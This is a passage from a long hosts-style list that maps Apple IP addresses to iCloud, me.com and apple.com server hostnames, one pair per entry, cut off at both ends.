nk20718003c.connectivity.icloud.com\n17.151.236.82 nk20718004c.connectivity.icloud.com\n17.151.236.83 nk20818001c.connectivity.icloud.com\n17.151.236.84 nk20818002c.connectivity.icloud.com\n17.151.236.85 nk20818003c.connectivity.icloud.com\n17.151.236.86 nk20818004c.connectivity.icloud.com\n17.151.237.18 p20-conduit.connectivity.icloud.com\n17.151.237.42 nk20120001c.connectivity.icloud.com\n17.151.237.43 nk20120002c.connectivity.icloud.com\n17.151.237.44 nk20120003c.connectivity.icloud.com\n17.151.237.45 nk20120004c.connectivity.icloud.com\n17.151.237.46 nk20220001c.connectivity.icloud.com\n17.151.237.47 nk20220002c.connectivity.icloud.com\n17.151.237.48 nk20220003c.connectivity.icloud.com\n17.151.237.49 nk20220004c.connectivity.icloud.com\n17.151.237.50 nk20320001c.connectivity.icloud.com\n17.151.237.51 nk20320002c.connectivity.icloud.com\n17.151.237.52 nk20320003c.connectivity.icloud.com\n17.151.237.53 nk20320004c.connectivity.icloud.com\n17.151.237.54 nk20420001c.connectivity.icloud.com\n17.151.237.55 nk20420002c.connectivity.icloud.com\n17.151.237.56 nk20420003c.connectivity.icloud.com\n17.151.237.57 nk20420004c.connectivity.icloud.com\n17.151.237.58 nk20520001c.connectivity.icloud.com\n17.151.237.59 nk20520002c.connectivity.icloud.com\n17.151.237.60 nk20520003c.connectivity.icloud.com\n17.151.237.61 nk20520004c.connectivity.icloud.com\n17.151.237.62 nk20620001c.connectivity.icloud.com\n17.151.237.63 nk20620002c.connectivity.icloud.com\n17.151.237.64 nk20620003c.connectivity.icloud.com\n17.151.237.65 nk20620004c.connectivity.icloud.com\n17.151.237.66 nk20720001c.connectivity.icloud.com\n17.151.237.67 nk20720002c.connectivity.icloud.com\n17.151.237.68 nk20720003c.connectivity.icloud.com\n17.151.237.69 nk20720004c.connectivity.icloud.com\n17.151.237.70 nk20820001c.connectivity.icloud.com\n17.151.237.71 nk20820002c.connectivity.icloud.com\n17.151.237.72 nk20820003c.connectivity.icloud.com\n17.151.237.73 nk20820004c.connectivity.icloud.com\n17.151.239.9 p22-conduit.connectivity.icloud.com\n17.151.239.10 nk20222003c.connectivity.icloud.com\n17.151.239.11 nk20222004c.connectivity.icloud.com\n17.151.239.12 nk20322001c.connectivity.icloud.com\n17.151.239.13 nk20322002c.connectivity.icloud.com\n17.151.239.14 nk20322003c.connectivity.icloud.com\n17.151.239.15 nk20322004c.connectivity.icloud.com\n17.151.239.16 nk20422001c.connectivity.icloud.com\n17.151.239.17 nk20422002c.connectivity.icloud.com\n17.151.239.18 nk20422003c.connectivity.icloud.com\n17.151.239.19 nk20422004c.connectivity.icloud.com\n17.151.239.20 nk20522001c.connectivity.icloud.com\n17.151.239.21 nk20522002c.connectivity.icloud.com\n17.151.239.22 nk20522003c.connectivity.icloud.com\n17.151.239.23 nk20522004c.connectivity.icloud.com\n17.151.239.24 nk20622001c.connectivity.icloud.com\n17.151.239.25 nk20622002c.connectivity.icloud.com\n17.151.239.26 nk20622003c.connectivity.icloud.com\n17.151.239.27 nk20622004c.connectivity.icloud.com\n17.151.239.28 nk20722001c.connectivity.icloud.com\n17.151.239.29 nk20722002c.connectivity.icloud.com\n17.151.239.30 nk20722003c.connectivity.icloud.com\n17.151.239.31 nk20722004c.connectivity.icloud.com\n17.151.239.32 nk20822001c.connectivity.icloud.com\n17.151.239.33 nk20822002c.connectivity.icloud.com\n17.151.239.34 nk20822003c.connectivity.icloud.com\n17.151.239.35 nk20822004c.connectivity.icloud.com\n17.151.239.36 nk20122001c.connectivity.icloud.com\n17.151.239.37 nk20122002c.connectivity.icloud.com\n17.151.239.38 nk20122003c.connectivity.icloud.com\n17.151.239.39 nk20122004c.connectivity.icloud.com\n17.151.239.40 nk20222001c.connectivity.icloud.com\n17.151.239.41 nk20222002c.connectivity.icloud.com\n17.152.249.51 vgr101.apple.com\n17.152.249.52 vgr102.apple.com\n17.152.249.53 vgr103.apple.com\n17.152.249.54 vgr104.apple.com\n17.152.249.55 vgr105.apple.com\n17.152.249.56 vgr106.apple.com\n17.152.249.57 vgr107.apple.com\n17.152.249.58 vgr108.apple.com\n17.152.249.73 rvgr1.apple.com\n17.152.249.74 rvgr2.apple.com\n17.152.249.85 xvgr1.apple.com\n17.152.249.86 xvgr2.apple.com\n17.154.8.11 r1s1i1.connectivity.me.com\n17.154.8.12 r1s1i2.connectivity.me.com\n17.154.8.13 r1s1i3.connectivity.me.com\n17.154.8.14 r1s1i4.connectivity.me.com\n17.154.8.15 r1s1i5.connectivity.me.com\n17.154.8.16 r1s1i6.connectivity.me.com\n17.154.8.17 r1s1i7.connectivity.me.com\n17.154.8.18 r1s1i8.connectivity.me.com\n17.154.8.19 r1s2i1.connectivity.me.com\n17.154.8.20 r1s2i2.connectivity.me.com\n17.154.8.21 r1s2i3.connectivity.me.com\n17.154.8.22 r1s2i4.connectivity.me.com\n17.154.8.23 r1s2i5.connectivity.me.com\n17.154.8.24 r1s2i6.connectivity.me.com\n17.154.8.25 r1s2i7.connectivity.me.com\n17.154.8.26 r1s2i8.connectivity.me.com\n17.154.8.27 r1s3i1.connectivity.me.com\n17.154.8.28 r1s3i2.connectivity.me.com\n17.154.8.29 r1s3i3.connectivity.me.com\n17.154.8.30 r1s3i4.connectivity.me.com\n17.154.8.31 r1s3i5.connectivity.me.com\n17.154.8.32 r1s3i6.connectivity.me.com\n17.154.8.33 r1s3i7.connectivity.me.com\n17.154.8.34 r1s3i8.connectivity.me.com\n17.154.8.35 r1s4i1.connectivity.me.com\n17.154.8.36 r1s4i2.connectivity.me.com\n17.154.8.37 r1s4i3.connectivity.me.com\n17.154.8.38 r1s4i4.connectivity.me.com\n17.154.8.39 r1s4i5.connectivity.me.com\n17.154.8.40 r1s4i6.connectivity.me.com\n17.154.8.41 r1s4i7.connectivity.me.com\n17.154.8.42 r1s4i8.connectivity.me.com\n17.154.8.43 r1s5i1.connectivity.me.com\n17.154.8.44 r1s5i2.connectivity.me.com\n17.154.8.45 r1s5i3.connectivity.me.com\n17.154.8.46 r1s5i4.connectivity.me.com\n17.154.8.47 r1s5i5.connectivity.me.com\n17.154.8.48 r1s5i6.connectivity.me.com\n17.154.8.49 r1s5i7.connectivity.me.com\n17.154.8.50 r1s5i8.connectivity.me.com\n17.154.8.51 r1s6i1.connectivity.me.com\n17.154.8.52 r1s6i2.connectivity.me.com\n17.154.8.53 r1s6i3.connectivity.me.com\n17.154.8.54 r1s6i4.connectivity.me.com\n17.154.8.55 r1s6i5.connectivity.me.com\n17.154.8.56 r1s6i6.connectivity.me.com\n17.154.8.57 r1s6i7.connectivity.me.com\n17.154.8.58 r1s6i8.connectivity.me.com\n17.154.8.59 r1s7i1.connectivity.me.com\n17.154.8.60 r1s7i2.connectivity.me.com\n17.154.8.61 r1s7i3.connectivity.me.com\n17.154.8.62 r1s7i4.connectivity.me.com\n17.154.8.63 r1s7i5.connectivity.me.com\n17.154.8.64 r1s7i6.connectivity.me.com\n17.154.8.65 r1s7i7.connectivity.me.com\n17.154.8.66 r1s7i8.connectivity.me.com\n17.154.8.67 r1s8i1.connectivity.me.com\n17.154.8.68 r1s8i2.connectivity.me.com\n17.154.8.69 r1s8i3.connectivity.me.com\n17.154.8.70 r1s8i4.connectivity.me.com\n17.154.8.71 r1s8i5.connectivity.me.com\n17.154.8.72 r1s8i6.connectivity.me.com\n17.154.8.73 r1s8i7.connectivity.me.com\n17.154.8.74 r1s8i8.connectivity.me.com\n17.154.8.75 r1s9i1.connectivity.me.com\n17.154.8.76 r1s9i2.connectivity.me.com\n17.154.8.77 r1s9i3.connectivity.me.com\n17.154.8.78 r1s9i4.connectivity.me.com\n17.154.8.79 r1s9i5.connectivity.me.com\n17.154.8.80 r1s9i6.connectivity.me.com\n17.154.8.81 r1s9i7.connectivity.me.com\n17.154.8.82 r1s9i8.connectivity.me.com\n17.154.8.83 r1s10i1.connectivity.me.com\n17.154.8.84 r1s10i2.connectivity.me.com\n17.154.8.85 r1s10i3.connectivity.me.com\n17.154.8.86 r1s10i4.connectivity.me.com\n17.154.8.87 r1s10i5.connectivity.me.com\n17.154.8.88 r1s10i6.connectivity.me.com\n17.154.8.89 r1s10i7.connectivity.me.com\n17.154.8.90 r1s10i8.connectivity.me.com\n17.154.8.91 r1s11i1.connectivity.me.com\n17.154.8.92 r1s11i2.connectivity.me.com\n17.154.8.93 r1s11i3.connectivity.me.com\n17.154.8.94 r1s11i4.connectivity.me.com\n17.154.8.95 r1s11i5.connectivity.me.com\n17.154.8.96 r1s11i6.connectivity.me.com\n17.154.8.97 r1s11i7.connectivity.me.com\n17.154.8.98 r1s11i8.connectivity.me.com\n17.154.8.99 r1s12i1.connectivity.me.com\n17.154.8.100 r1s12i2.connectivity.me.com\n17.154.8.101 r1s12i3.connectivity.me.com\n17.154.8.102 r1s12i4.connectivity.me.com\n17.154.8.103 r1s12i5.connectivity.me.com\n17.154.8.104 r1s12i6.connectivity.me.com\n17.154.8.105 r1s12i7.connectivity.me.com\n17.154.8.106 r1s12i8.connectivity.me.com\n17.154.14.131 nk11r11-fileservices.me.com\n17.154.14.140 nk11r11-phoneservices.me.com\n17.154.14.148 nk11r11-syncservices.me.com\n17.154.14.151 nk11r11-webservices.mac.com\n17.154.14.152 nk11r11-webservices.me.com\n17.154.64.67 staging-carnival.itunes.apple.com\n17.154.66.13 itcusvc.itunes.apple.com\n17.154.66.40 storepreview.apple.com\n17.154.239.13 service-nk11-a.ess.apple.com\n17.154.239.14 service2-nk11-a.ess.apple.com\n17.154.239.16 service1-nk11-a.ess.apple.com\n17.155.4.8 invitation.ess.apple.com\n17.155.127.11 service-nk11-a.gc.apple.com\n17.155.127.14 service-nk11-b.gc.apple.com\n17.155.160.35 iphone-services-ls-nk11-ssl.apple.com\n17.155.160.103 mac-services-ssl.apple.com\n17.155.160.104 mac-services-ls-nk11.apple.com\n17.158.10.13 nk20203004c.connectivity.icloud.com\n17.158.10.15 nk20403004c.connectivity.icloud.com\n17.158.10.58 nk20503004c.connectivity.icloud.com\n17.158.10.59 nk20103004c.connectivity.icloud.com\n17.158.10.62 nk20803004c.connectivity.icloud.com\n17.158.10.96 nk20303001c.connectivity.icloud.com\n17.158.10.97 nk20703001c.connectivity.icloud.com\n17.158.10.98 nk20603001c.connectivity.icloud.com\n17.158.10.99 nk20203001c.connectivity.icloud.com\n17.158.10.100 nk20403001c.connectivity.icloud.com\n17.158.10.101 nk20803001c.connectivity.icloud.com\n17.158.10.102 nk20503001c.connectivity.icloud.com\n17.158.10.103 nk20103001c.connectivity.icloud.com\n17.158.10.104 p03-conduit.connectivity.icloud.com\n17.158.10.105 nk20303002c.connectivity.icloud.com\n17.158.10.106 nk20703002c.connectivity.icloud.com\n17.158.10.107 nk20603002c.connectivity.icloud.com\n17.158.10.108 nk20203002c.connectivity.icloud.com\n17.158.10.109 nk20403002c.connectivity.icloud.com\n17.158.10.110 nk20803002c.connectivity.icloud.com\n17.158.10.111 nk20503002c.connectivity.icloud.com\n17.158.10.112 nk20103002c.connectivity.icloud.com\n17.158.10.117 nk20303003c.connectivity.icloud.com\n17.158.10.118 nk20703003c.connectivity.icloud.com\n17.158.10.119 nk20603003c.connectivity.icloud.com\n17.158.10.120 nk20203003c.connectivity.icloud.com\n17.158.10.121 nk20403003c.connectivity.icloud.com\n17.158.10.122 nk20803003c.connectivity.icloud.com\n17.158.10.123 nk20503003c.connectivity.icloud.com\n17.158.10.124 nk20103003c.connectivity.icloud.com\n17.158.10.125 nk20303004c.connectivity.icloud.com\n17.158.10.126 nk20703004c.connectivity.icloud.com\n17.158.10.127 nk20603004c.connectivity.icloud.com\n17.158.28.85 nk20304001c.connectivity.icloud.com\n17.158.28.86 nk20704001c.connectivity.icloud.com\n17.158.28.87 nk20604001c.connectivity.icloud.com\n17.158.28.88 nk20204001c.connectivity.icloud.com\n17.158.28.89 nk20404001c.connectivity.icloud.com\n17.158.28.90 nk20804001c.connectivity.icloud.com\n17.158.28.91 nk20504001c.connectivity.icloud.com\n17.158.28.92 nk20104001c.connectivity.icloud.com\n17.158.28.93 p04-conduit.connectivity.icloud.com\n17.158.28.94 nk20304002c.connectivity.icloud.com\n17.158.28.95 nk20704002c.connectivity.icloud.com\n17.158.28.96 nk20604002c.connectivity.icloud.com\n17.158.28.97 nk20204002c.connectivity.icloud.com\n17.158.28.98 nk20404002c.connectivity.icloud.com\n17.158.28.99 nk20804002c.connectivity.icloud.com\n17.158.28.100 nk20504002c.connectivity.icloud.com\n17.158.28.101 nk20104002c.connectivity.icloud.com\n17.158.28.106 nk20304003c.connectivity.icloud.com\n17.158.28.107 nk20704003c.connectivity.icloud.com\n17.158.28.108 nk20604003c.connectivity.icloud.com\n17.158.28.109 nk20204003c.connectivity.icloud.com\n17.158.28.110 nk20404003c.connectivity.icloud.com\n17.158.28.111 nk20804003c.connectivity.icloud.com\n17.158.28.112 nk20504003c.connectivity.icloud.com\n17.158.28.113 nk20104003c.connectivity.icloud.com\n17.158.28.114 nk20304004c.connectivity.icloud.com\n17.158.28.115 nk20704004c.connectivity.icloud.com\n17.158.28.116 nk20604004c.connectivity.icloud.com\n17.158.28.117 nk20204004c.connectivity.icloud.com\n17.158.28.118 nk20404004c.connectivity.icloud.com\n17.158.28.119 nk20804004c.connectivity.icloud.com\n17.158.28.120 nk20504004c.connectivity.icloud.com\n17.158.28.121 nk20104004c.connectivity.icloud.com\n17.158.36.41 nk20307001c.connectivity.icloud.com\n17.158.36.51 nk20707001c.connectivity.icloud.com\n17.158.36.52 nk20607001c.connectivity.icloud.com\n17.158.36.80 nk20207001c.connectivity.icloud.com\n17.158.36.81 nk20407001c.connectivity.icloud.com\n17.158.36.82 nk20807001c.connectivity.icloud.com\n17.158.36.83 nk20507001c.connectivity.icloud.com\n17.158.36.84 nk20107001c.connectivity.icloud.com\n17.158.36.85 p07-conduit.connectivity.icloud.com\n17.158.36.86 nk20307002c.connectivity.icloud.com\n17.158.36.87 nk20707002c.connectivity.icloud.com\n17.158.36.88 nk20607002c.connectivity.icloud.com\n17.158.36.89 nk20207002c.connectivity.icloud.com\n17.158.36.90 nk20407002c.connectivity.icloud.com\n17.158.36.91 nk20807002c.connectivity.icloud.com\n17.158.36.92 nk20507002c.connectivity.icloud.com\n17.158.36.93 nk20107002c.connectivity.icloud.com\n17.158.36.98 nk20307003c.connectivity.icloud.com\n17.158.36.99 nk20707003c.connectivity.icloud.com\n17.158.36.100 nk20607003c.connectivity.icloud.com\n17.158.36.101 nk20207003c.connectivity.icloud.com\n17.158.36.102 nk20407003c.connectivity.icloud.com\n17.158.36.103 nk20807003c.connectivity.icloud.com\n17.158.36.104 nk20507003c.connectivity.icloud.com\n17.158.36.105 nk20107003c.connectivity.icloud.com\n17.158.36.106 nk20307004c.connectivity.icloud.com\n17.158.36.107 nk20707004c.connectivity.icloud.com\n17.158.36.108 nk20607004c.connectivity.icloud.com\n17.158.36.109 nk20207004c.connectivity.icloud.com\n17.158.36.110 nk20407004c.connectivity.icloud.com\n17.158.36.111 nk20807004c.connectivity.icloud.com\n17.158.36.112 nk20507004c.connectivity.icloud.com\n17.158.36.113 nk20107004c.connectivity.icloud.com\n17.158.52.41 nk20308001c.connectivity.icloud.com\n17.158.52.73 nk20708001c.connectivity.icloud.com\n17.158.52.74 nk20608001c.connectivity.icloud.com\n17.158.52.80 nk20208001c.connectivity.icloud.com\n17.158.52.81 nk20408001c.connectivity.icloud.com\n17.158.52.82 nk20808001c.connectivity.icloud.com\n17.158.52.83 nk20508001c.connectivity.icloud.com\n17.158.52.84 nk20108001c.connectivity.icloud.com\n17.158.52.85 p08-conduit.connectivity.icloud.com\n17.158.52.86 nk20308002c.connectivity.icloud.com\n17.158.52.87 nk20708002c.connectivity.icloud.com\n17.158.52.88 nk20608002c.connectivity.icloud.com\n17.158.52.89 nk20208002c.connectivity.icloud.com\n17.158.52.90 nk20408002c.connectivity.icloud.com\n17.158.52.91 nk20808002c.connectivity.icloud.com\n17.158.52.92 nk20508002c.connectivity.icloud.com\n17.158.52.93 nk20108002c.connectivity.icloud.com\n17.158.52.98 nk20308003c.connectivity.icloud.com\n17.158.52.99 nk20708003c.connectivity.icloud.com\n17.158.52.100 nk20608003c.connectivity.icloud.com\n17.158.52.101 nk20208003c.connectivity.icloud.com\n17.158.52.102 nk20408003c.connectivity.icloud.com\n17.158.52.103 nk20808003c.connectivity.icloud.com\n17.158.52.104 nk20508003c.connectivity.icloud.com\n17.158.52.105 nk20108003c.connectivity.icloud.com\n17.158.52.106 nk20308004c.connectivity.icloud.com\n17.158.52.107 nk20708004c.connectivity.icloud.com\n17.158.52.108 nk20608004c.connectivity.icloud.com\n17.158.52.109 nk20208004c.connectivity.icloud.com\n17.158.52.110 nk20408004c.connectivity.icloud.com\n17.158.52.111 nk20808004c.connectivity.icloud.com\n17.158.52.112 nk20508004c.connectivity.icloud.com\n17.158.52.113 nk20108004c.connectivity.icloud.com\n17.158.146.8 nk20001003.connectivity.icloud.com\n17.158.146.9 nk20101003.connectivity.icloud.com\n17.158.146.10 nk20201003.connectivity.icloud.com\n17.158.146.11 nk20301003.connectivity.icloud.com\n17.158.146.12 nk20401003.connectivity.icloud.com\n17.158.146.13 nk20501003.connectivity.icloud.com\n17.158.146.14 nk20601003.connectivity.icloud.com\n17.158.146.15 nk20701003.connectivity.icloud.com\n17.158.146.16 nk20001002.connectivity.icloud.com\n17.158.146.17 nk20101002.connectivity.icloud.com\n17.158.146.18 nk20201002.connectivity.icloud.com\n17.158.146.19 nk20301002.connectivity.icloud.com\n17.158.146.20 nk20401002.connectivity.icloud.com\n17.158.146.21 nk20501002.connectivity.icloud.com\n17.158.146.22 nk20601002.connectivity.icloud.com\n17.158.146.23 nk20701002.connectivity.icloud.com\n17.158.146.24 nk20001001.connectivity.icloud.com\n17.158.146.25 nk20101001.connectivity.icloud.com\n17.158.146.26 nk20201001.connectivity.icloud.com\n17.158.146.27 nk20301001.connectivity.icloud.com\n17.158.146.28 nk20401001.connectivity.icloud.com\n17.158.146.29 nk20501001.connectivity.icloud.com\n17.158.146.30 nk20601001.connectivity.icloud.com\n17.158.146.31 nk20701001.connectivity.icloud.com\n17.158.146.32 nk20002001.connectivity.icloud.com\n17.158.146.33 nk20102001.connectivity.icloud.com\n17.158.146.34 nk20202001.connectivity.icloud.com\n17.158.146.35 nk20302001.connectivity.icloud.com\n17.158.146.36 nk20402001.connectivity.icloud.com\n17.158.146.37 nk20502001.connectivity.icloud.com\n17.158.146.38 nk20602001.connectivity.icloud.com\n17.158.146.39 nk20702001.connectivity.icloud.com\n17.158.146.40 nk20002002.connectivity.icloud.com\n17.158.146.41 nk20102002.connectivity.icloud.com\n17.158.146.42 nk20202002.connectivity.icloud.com\n17.158.146.43 nk20302002.connectivity.icloud.com\n17.158.146.44 nk20402002.connectivity.icloud.com\n17.158.146.45 nk20502002.connectivity.icloud.com\n17.158.146.46 nk20602002.connectivity.icloud.com\n17.158.146.47 nk20702002.connectivity.icloud.com\n17.158.146.48 nk20002003.connectivity.icloud.com\n17.158.146.49 nk20102003.connectivity.icloud.com\n17.158.146.50 nk20202003.connectivity.icloud.com\n17.158.146.51 nk20302003.connectivity.icloud.com\n17.158.146.52 nk20402003.connectivity.icloud.com\n17.158.146.53 nk20502003.connectivity.icloud.com\n17.158.146.54 nk20602003.connectivity.icloud.com\n17.158.146.55 nk20702003.connectivity.icloud.com\n17.158.146.56 nk20003001.connectivity.icloud.com\n17.158.146.57 nk20103001.connectivity.icloud.com\n17.158.146.58 nk20203001.connectivity.icloud.com\n17.158.146.59 nk20303001.connectivity.icloud.com\n17.158.146.60 nk20403001.connectivity.icloud.com\n17.158.146.61 nk20503001.connectivity.icloud.com\n17.158.146.62 nk20603001.connectivity.icloud.com\n17.158.146.63 nk20703001.connectivity.icloud.com\n17.158.146.64 nk20003002.connectivity.icloud.com\n17.158.146.65 nk20103002.connectivity.icloud.com\n17.158.146.66 nk20203002.connectivity.icloud.com\n17.158.146.67 nk20303002.connectivity.icloud.com\n17.158.146.68 nk20403002.connectivity.icloud.com\n17.158.146.69 nk20503002.connectivity.icloud.com\n17.158.146.70 nk20603002.connectivity.icloud.com\n17.158.146.71 nk20703002.connectivity.icloud.com\n17.158.146.72 nk20003003.connectivity.icloud.com\n17.158.146.73 nk20103003.connectivity.icloud.com\n17.158.146.74 nk20203003.connectivity.icloud.com\n17.158.146.75 nk20303003.connectivity.icloud.com\n17.158.146.76 nk20403003.connectivity.icloud.com\n17.158.146.77 nk20503003.connectivity.icloud.com\n17.158.146.78 nk20603003.connectivity.icloud.com\n17.158.146.79 nk20703003.connectivity.icloud.com\n17.158.146.80 nk20004001.connectivity.icloud.com\n17.158.146.81 nk20104001.connectivity.icloud.com\n17.158.146.82 nk20204001.connectivity.icloud.com\n17.158.146.83 nk20304001.connectivity.icloud.com\n17.158.146.84 nk20404001.connectivity.icloud.com\n17.158.146.85 nk20504001.connectivity.icloud.com\n17.158.146.86 nk20604001.connectivity.icloud.com\n17.158.146.87 nk20704001.connectivity.icloud.com\n17.158.146.88 nk20004002.connectivity.icloud.com\n17.158.146.89 nk20104002.connectivity.icloud.com\n17.158.146.90 nk20204002.connectivity.icloud.com\n17.158.146.91 nk20304002.connectivity.icloud.com\n17.158.146.92 nk20404002.connectivity.icloud.com\n17.158.146.93 nk20504002.connectivity.icloud.com\n17.158.146.94 nk20604002.connectivity.icloud.com\n17.158.146.95 nk20704002.connectivity.icloud.com\n17.158.146.96 nk20004003.connectivity.icloud.com\n17.158.146.97 nk20104003.connectivity.icloud.com\n17.158.146.98 nk20204003.connectivity.icloud.com\n17.158.146.99 nk20304003.connectivity.icloud.com\n17.158.146.100 nk20404003.connectivity.icloud.com\n17.158.146.101 nk20504003.connectivity.icloud.com\n17.158.146.102 nk20604003.connectivity.icloud.com\n17.158.146.103 nk20704003.connectivity.icloud.com\n17.158.146.104 nk20005001.connectivity.icloud.com\n17.158.146.105 nk20105001.connectivity.icloud.com\n17.158.146.106 nk20205001.connectivity.icloud.com\n17.158.146.107 nk20305001.connectivity.icloud.com\n17.158.146.108 nk20405001.connectivity.icloud.com\n17.158.146.109 nk20505001.connectivity.icloud.com\n17.158.146.110 nk20605001.connectivity.icloud.com\n17.158.146.111 nk20705001.connectivity.icloud.com\n17.158.146.112 nk20005002.connectivity.icloud.com\n17.158.146.113 nk20105002.connectivity.icloud.com\n17.158.146.114 nk20205002.connectivity.icloud.com\n17.158.146.115 nk20305002.connectivity.icloud.com\n17.158.146.116 nk20405002.connectivity.icloud.com\n17.158.146.117 nk20505002.connectivity.icloud.com\n17.158.146.118 nk20605002.connectivity.icloud.com\n17.158.146.119 nk20705002.connectivity.icloud.com\n17.158.146.120 nk20005003.connectivity.icloud.com\n17.158.146.121 nk20105003.connectivity.icloud.com\n17.158.146.122 nk20205003.connectivity.icloud.com\n17.158.146.123 nk20305003.connectivity.icloud.com\n17.158.146.124 nk20405003.connectivity.icloud.com\n17.158.146.125 nk20505003.connectivity.icloud.com\n17.158.146.126 nk20605003.connectivity.icloud.com\n17.158.146.127 nk20705003.connectivity.icloud.com\n17.158.146.128 nk20006001.connectivity.icloud.com\n17.158.146.129 nk20106001.connectivity.icloud.com\n17.158.146.130 nk20206001.connectivity.icloud.com\n17.158.146.131 nk20306001.connectivity.icloud.com\n17.158.146.132 nk20406001.connectivity.icloud.com\n17.158.146.133 nk20506001.connectivity.icloud.com\n17.158.146.134 nk20606001.connectivity.icloud.com\n17.158.146.135 nk20706001.connectivity.icloud.com\n17.158.146.136 nk20006002.connectivity.icloud.com\n17.158.146.137 nk20106002.connectivity.icloud.com\n17.158.146.138 nk20206002.connectivity.icloud.com\n17.158.146.139 nk20306002.connectivity.icloud.com\n17.158.146.140 nk20406002.connectivity.icloud.com\n17.158.146.141 nk20506002.connectivity.icloud.com\n17.158.146.142 nk20606002.connectivity.icloud.com\n17.158.146.143 nk20706002.connectivity.icloud.com\n17.158.146.144 nk20006003.connectivity.icloud.com\n17.158.146.145 nk20106003.connectivity.icloud.com\n17.158.146.146 nk20206003.connectivity.icloud.com\n17.158.146.147 nk20306003.connectivity.icloud.com\n17.158.146.148 nk20406003.connectivity.icloud.com\n17.158.146.149 nk20506003.connectivity.icloud.com\n17.158.146.150 nk20606003.connectivity.icloud.com\n17.158.146.151 nk20706003.connectivity.icloud.com\n17.158.146.152 nk20007001.connectivity.icloud.com\n17.158.146.153 nk20107001.connectivity.icloud.com\n17.158.146.154 nk20207001.connectivity.icloud.com\n17.158.146.155 nk20307001.connectivity.icloud.com\n17.158.146.156 nk20407001.connectivity.icloud.com\n17.158.146.157 nk20507001.connectivity.icloud.com\n17.158.146.158 nk20607001.connectivity.icloud.com\n17.158.146.159 nk20707001.connectivity.icloud.com\n17.158.146.160 nk20007002.connectivity.icloud.com\n17.158.146.161 nk20107002.connectivity.icloud.com\n17.158.146.162 nk20207002.connectivity.icloud.com\n17.158.146.163 nk20307002.connectivity.icloud.com\n17.158.146.164 nk20407002.connectivity.icloud.com\n17.158.146.165 nk20507002.connectivity.icloud.com\n17.158.146.166 nk20607002.connectivity.icloud.com\n17.158.146.167 nk20707002.connectivity.icloud.com\n17.158.146.168 nk20007003.connectivity.icloud.com\n17.158.146.169 nk20107003.connectivity.icloud.com\n17.158.146.170 nk20207003.connectivity.icloud.com\n17.158.146.171 nk20307003.connectivity.icloud.com\n17.158.146.172 nk20407003.connectivity.icloud.com\n17.158.146.173 nk20507003.connectivity.icloud.com\n17.158.146.174 nk20607003.connectivity.icloud.com\n17.158.146.175 nk20707003.connectivity.icloud.com\n17.158.146.176 nk20008001.connectivity.icloud.com\n17.158.146.177 nk20108001.connectivity.icloud.com\n17.158.146.178 nk20208001.connectivity.icloud.com\n17.158.146.179 nk20308001.connectivity.icloud.com\n17.158.146.180 nk20408001.connectivity.icloud.com\n17.158.146.181 nk20508001.connectivity.icloud.com\n17.158.146.182 nk20608001.connectivity.icloud.com\n17.158.146.183 nk20708001.connectivity.icloud.com\n17.158.146.184 nk20008002.connectivity.icloud.com\n17.158.146.185 nk20108002.connectivity.icloud.com\n17.158.146.186 nk20208002.connectivity.icloud.com\n17.158.146.187 nk20308002.connectivity.icloud.com\n17.158.146.188 nk20408002.connectivity.icloud.com\n17.158.146.189 nk20508002.connectivity.icloud.com\n17.158.146.190 nk20608002.connectivity.icloud.com\n17.158.146.191 nk20708002.connectivity.icloud.com\n17.158.146.192 nk20008003.connectivity.icloud.com\n17.158.146.193 nk20108003.connectivity.icloud.com\n17.158.146.194 nk20208003.connectivity.icloud.com\n17.158.146.195 nk20308003.connectivity.icloud.com\n17.158.146.196 nk20408003.connectivity.icloud.com\n17.158.146.197 nk20508003.connectivity.icloud.com\n17.158.146.198 nk20608003.connectivity.icloud.com\n17.158.146.199 nk20708003.connectivity.icloud.com\n17.158.146.224 nk20009001.connectivity.icloud.com\n17.158.146.225 nk20109001.connectivity.icloud.com\n17.158.146.226 nk20209001.connectivity.icloud.com\n17.158.146.227 nk20309001.connectivity.icloud.com\n17.158.146.228 nk20409001.connectivity.icloud.com\n17.158.146.229 nk20509001.connectivity.icloud.com\n17.158.146.230 nk20609001.connectivity.icloud.com\n17.158.146.231 nk20709001.connectivity.icloud.com\n17.158.146.232 nk20009002.connectivity.icloud.com\n17.158.146.233 nk20109002.connectivity.icloud.com\n17.158.146.234 nk20209002.connectivity.icloud.com\n17.158.146.235 nk20309002.connectivity.icloud.com\n17.158.146.236 nk20409002.connectivity.icloud.com\n17.158.146.237 nk20509002.connectivity.icloud.com\n17.158.146.238 nk20609002.connectivity.icloud.com\n17.158.146.239 nk20709002.connectivity.icloud.com\n17.158.146.240 nk20009003.connectivity.icloud.com\n17.158.146.241 nk20109003.connectivity.icloud.com\n17.158.146.242 nk20209003.connectivity.icloud.com\n17.158.146.243 nk20309003.connectivity.icloud.com\n17.158.146.244 nk20409003.connectivity.icloud.com\n17.158.146.245 nk20509003.connectivity.icloud.com\n17.158.146.246 nk20609003.connectivity.icloud.com\n17.158.146.247 nk20709003.connectivity.icloud.com\n17.158.146.248 nk20010001.connectivity.icloud.com\n17.158.146.249 nk20110001.connectivity.icloud.com\n17.158.146.250 nk20210001.connectivity.icloud.com\n17.158.146.251 nk20310001.connectivity.icloud.com\n17.158.146.252 nk20410001.connectivity.icloud.com\n17.158.146.253 nk20510001.connectivity.icloud.com\n17.158.146.254 nk20610001.connectivity.icloud.com\n17.158.146.255 nk20710001.connectivity.icloud.com\n17.158.147.0 nk20010002.connectivity.icloud.com\n17.158.147.1 nk20110002.connectivity.icloud.com\n17.158.147.2 nk20210002.connectivity.icloud.com\n17.158.147.3 nk20310002.connectivity.icloud.com\n17.158.147.4 nk20410002.connectivity.icloud.com\n17.158.147.5 nk20510002.connectivity.icloud.com\n17.158.147.6 nk20610002.connectivity.icloud.com\n17.158.147.7 nk20710002.connectivity.icloud.com\n17.158.147.8 nk20010003.connectivity.icloud.com\n17.158.147.9 nk20110003.connectivity.icloud.com\n17.158.147.10 nk20210003.connectivity.icloud.com\n17.158.147.11 nk20310003.connectivity.icloud.com\n17.158.147.12 nk20410003.connectivity.icloud.com\n17.158.147.13 nk20510003.connectivity.icloud.com\n17.158.147.14 nk20610003.connectivity.icloud.com\n17.158.147.15 nk20710003.connectivity.icloud.com\n17.164.0.34 st10309001c.connectivity.icloud.com\n17.164.0.35 st10709001c.connectivity.icloud.com\n17.164.0.38 st10609001c.connectivity.icloud.com\n17.164.0.44 st10209001c.connectivity.icloud.com\n17.164.0.47 st10409001c.connectivity.icloud.com\n17.164.0.58 st10809001c.connectivity.icloud.com\n17.164.0.59 st10509001c.connectivity.icloud.com\n17.164.0.63 